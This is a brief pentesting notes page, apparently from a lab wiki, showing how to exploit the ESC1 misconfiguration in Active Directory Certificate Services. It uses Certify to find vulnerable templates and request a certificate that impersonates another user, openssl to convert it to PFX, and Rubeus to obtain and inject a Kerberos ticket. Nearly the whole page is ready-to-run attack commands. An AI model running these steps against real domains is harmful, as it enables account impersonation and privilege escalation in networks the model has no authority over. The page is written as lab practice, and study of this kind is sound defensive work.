# certify.exe
A cool [tool](https://github.com/GhostPack/Certify) for investigating Active Directory certificate abuse.

## Find all vulnerable certs
```
certify.exe find /vulnerable
```

## Abuse ESC1 (example from our lab)
```
Certify.exe request /ca:tt-dc01.tangent.town\tangent-TT-DC01-CA /template:4lewsers /altname:tommy
```

Now copy everything from...
```
-----BEGIN RSA PRIVATE KEY-----
```

...to...

```
-----END CERTIFICATE-----
```

Then save that to a file called `cert.pem`. Next:

```
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```

This will give you the `cert.pfx` file, which you can use to request a TGT with [Rubeus](/pentesting/Internal/rubeus):

```
Rubeus.exe asktgt /user:ad-user-you-chose-to-impersonate-with-certify.exe-command /certificate:cert.pfx /ptt /nowrap
```